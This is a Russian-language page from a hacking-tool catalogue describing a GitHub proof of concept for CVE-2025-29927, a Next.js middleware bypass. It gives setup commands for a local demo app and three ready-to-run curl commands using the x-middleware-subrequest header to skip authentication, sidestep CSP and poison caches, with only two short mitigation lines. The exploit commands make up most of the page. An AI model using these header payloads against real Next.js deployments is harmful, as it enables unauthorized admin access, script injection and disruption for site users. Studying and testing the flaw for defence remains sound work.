Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 Proof of Concept | Kitploit
Инструменты/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassWeb Security
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Proof of Concept

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29927: PoC обхода промежуточного ПО Next.js

Обзор

Этот PoC демонстрирует CVE-2025-29927 — уязвимость в промежуточном ПО Next.js, которая позволяет злоумышленникам обходить механизмы аутентификации, авторизации и CSP с помощью заголовка x-middleware-subrequest.

Затронутые версии

Версии Next.js с 11.1.4 по 15.1.7

Настройка и установка

1️⃣ Клонирование и установка PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

Приложение запустится на http://localhost:3000

Сценарии эксплуатации

1️⃣ Обход аутентификации и авторизации (cURL)

1- Используйте x-middleware-subrequest для получения несанкционированного доступа:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 Ожидаемый результат: Ответ возвращает admin admin, несмотря на обход аутентификации.

result screenshot

2️⃣ Обход CSP для внедрения XSS

Если CSP применяется через промежуточное ПО, обойдите его:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 Ожидаемый результат: CSP игнорируется, что позволяет выполнение вредоносных скриптов.

3️⃣ Атака отравления кэша (CPDoS)

Эксплуатируйте отравление кэша, принудительно вызывая повреждённый ответ:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 Ожидаемый результат: Страница кэшируется с некорректным содержимым, нарушая работу обычных пользователей.

Стратегии смягчения (Митигации)

  • ✅ Проверяйте логику промежуточного ПО для предотвращения обхода.
  • ✅ Обновите Next.js после выхода патченной версии.

Благодарности

🔍 Обнаружено: Allam Rachid (zhero;) & Allam Yasser (inzo_)

Скачать инструмент